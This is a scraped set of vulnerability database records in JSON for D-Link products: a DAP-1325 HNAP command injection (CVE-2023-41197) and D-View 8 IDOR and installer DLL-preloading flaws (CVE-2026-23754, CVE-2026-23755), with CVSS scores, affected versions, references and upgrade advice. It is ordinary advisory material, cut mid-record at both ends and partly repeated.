"trust": 0.8
}
}
VAR-202309-0302
Vulnerability from variot - Updated: 2025-11-26 22:32D-Link DAP-1325 HNAP SetHostIPv6StaticSettings StaticDefaultGateway Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of a request parameter provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18817. D-Link Systems, Inc. of DAP-1325 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support wired/wireless network switching or connection to different wireless networks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-0302",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-1325",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.09b03"
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-1325 firmware 1.09b03"
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1305"
},
{
"db": "CNVD",
"id": "CNVD-2025-29316"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028456"
},
{
"db": "NVD",
"id": "CVE-2023-41197"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1305"
}
],
"trust": 0.7
},
"cve": "CVE-2023-41197",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29316",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-41197",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-41197",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-41197",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-41197",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-41197",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-41197",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-41197",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29316",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1305"
},
{
"db": "CNVD",
"id": "CNVD-2025-29316"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028456"
},
{
"db": "NVD",
"id": "CVE-2023-41197"
},
{
"db": "NVD",
"id": "CVE-2023-41197"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-1325 HNAP SetHostIPv6StaticSettings StaticDefaultGateway Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the handling of a request parameter provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18817. D-Link Systems, Inc. of DAP-1325 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support wired/wireless network switching or connection to different wireless networks",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-41197"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028456"
},
{
"db": "ZDI",
"id": "ZDI-23-1305"
},
{
"db": "CNVD",
"id": "CNVD-2025-29316"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-41197",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-23-1305",
"trust": 2.5
},
{
"db": "DLINK",
"id": "SAP10351",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028456",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-18817",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29316",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1305"
},
{
"db": "CNVD",
"id": "CNVD-2025-29316"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028456"
},
{
"db": "NVD",
"id": "CVE-2023-41197"
}
]
},
"id": "VAR-202309-0302",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29316"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29316"
}
]
},
"last_update_date": "2025-11-26T22:32:47.754000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10351"
},
{
"title": "Patch for D-Link DAP-1325 StaticDefaultGateway Command Injection Remote Code Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/757411"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1305"
},
{
"db": "CNVD",
"id": "CNVD-2025-29316"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028456"
},
{
"db": "NVD",
"id": "CVE-2023-41197"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10351"
},
{
"trust": 1.8,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1305/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-41197"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-41197"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1305"
},
{
"db": "CNVD",
"id": "CNVD-2025-29316"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028456"
},
{
"db": "NVD",
"id": "CVE-2023-41197"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1305"
},
{
"db": "CNVD",
"id": "CNVD-2025-29316"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028456"
},
{
"db": "NVD",
"id": "CVE-2023-41197"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-07T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1305"
},
{
"date": "2025-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29316"
},
{
"date": "2025-03-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028456"
},
{
"date": "2024-05-03T03:15:30.237000",
"db": "NVD",
"id": "CVE-2023-41197"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-07T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1305"
},
{
"date": "2025-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29316"
},
{
"date": "2025-03-24T02:08:00",
"db": "JVNDB",
"id": "JVNDB-2023-028456"
},
{
"date": "2025-03-12T17:34:40.580000",
"db": "NVD",
"id": "CVE-2023-41197"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-1325\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028456"
}
],
"trust": 0.8
}
}
CVE-2026-23755 (GCVE-0-2026-23755)
Vulnerability from nvd – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09- CWE-427 - Uncontrolled Search Path Element
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisorypatch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23755",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:07.575974Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:59.815Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427 Uncontrolled Search Path Element",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:24.354Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-installer-dll-preloading-via-uncontrolled-search-path"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 Installer DLL Preloading via Uncontrolled Search Path",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23755",
"datePublished": "2026-01-21T18:02:30.160Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:24.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-23754 (GCVE-0-2026-23754)
Vulnerability from nvd – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09- CWE-639 - Authorization Bypass Through User-Controlled Key
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisorypatch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23754",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:04.543748Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:54.833Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:23.656Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-idor-allows-credential-disclosure-and-account-takeover"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 IDOR Allows Credential Disclosure and Account Takeover",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23754",
"datePublished": "2026-01-21T18:02:45.878Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:23.656Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-23754 (GCVE-0-2026-23754)
Vulnerability from cvelistv5 – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09- CWE-639 - Authorization Bypass Through User-Controlled Key
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisorypatch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23754",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:04.543748Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:54.833Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:23.656Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-idor-allows-credential-disclosure-and-account-takeover"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 IDOR Allows Credential Disclosure and Account Takeover",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23754",
"datePublished": "2026-01-21T18:02:45.878Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:23.656Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-23755 (GCVE-0-2026-23755)
Vulnerability from cvelistv5 – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09- CWE-427 - Uncontrolled Search Path Element
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisorypatch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23755",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:07.575974Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:59.815Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
